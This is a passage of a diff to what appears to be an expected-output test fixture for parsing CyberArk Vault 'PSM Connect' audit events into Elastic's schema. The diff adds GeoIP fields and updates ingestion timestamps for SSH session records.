\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:46:56\",\"IsoTimestamp\":\"2021-03-11T17:46:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -324,10 +342,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -409,7 +436,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331150400Z", + "ingested": "2021-12-14T14:42:12.780167584Z", "original": "\u003c5\u003e1 2021-03-11T17:48:34Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:48:34\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:48:34Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:48:34\",\"IsoTimestamp\":\"2021-03-11T17:48:34Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -433,10 +460,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -518,7 +554,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331156200Z", + "ingested": "2021-12-14T14:42:12.780168072Z", "original": "\u003c5\u003e1 2021-03-11T17:54:56Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:54:56\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:54:56Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:54:56\",\"IsoTimestamp\":\"2021-03-11T17:54:56Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -542,10 +578,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -627,7 +672,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331162200Z", + "ingested": "2021-12-14T14:42:12.780168489Z", "original": "\u003c5\u003e1 2021-03-11T17:56:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:56:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:56:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:56:37\",\"IsoTimestamp\":\"2021-03-11T17:56:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -651,10 +696,19 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "adrian" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { 
@@ -736,7 +790,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331168Z", + "ingested": "2021-12-14T14:42:12.780168892Z", "original": "\u003c5\u003e1 2021-03-11T20:23:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:25\",\"IsoTimestamp\":\"2021-03-11T20:23:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\",\"Message\":\"PSM Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", 
@@ -760,17 +814,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -850,7 +922,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331173800Z", + "ingested": "2021-12-14T14:42:12.780169288Z", "original": "\u003c5\u003e1 2021-03-14T13:49:37Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:37\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:37Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003ePSM Connect\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" 
Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:37\",\"IsoTimestamp\":\"2021-03-14T13:49:37Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"300\",\"Desc\":\"PSM Connect\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"PSM Connect\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\",\"Message\":\"PSM 
Connect\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "300", "kind": "event", @@ -874,17 +946,35 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.15", "user": { "name": "testark" }, - "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", "user": { "name": "Administrator" }, - "address": "67.43.156.13", "ip": "67.43.156.13" }, "tags": [ 
@@ -964,7 +1054,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:36:47.331178100Z", + "ingested": "2021-12-14T14:42:12.780169694Z", "original": "\u003c5\u003e1 2021-03-14T13:50:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:50:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:50:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e300\u003c/MessageID\u003e\\n \u003cDesc\u003ePSM Connect\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003ePSM Connect\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n 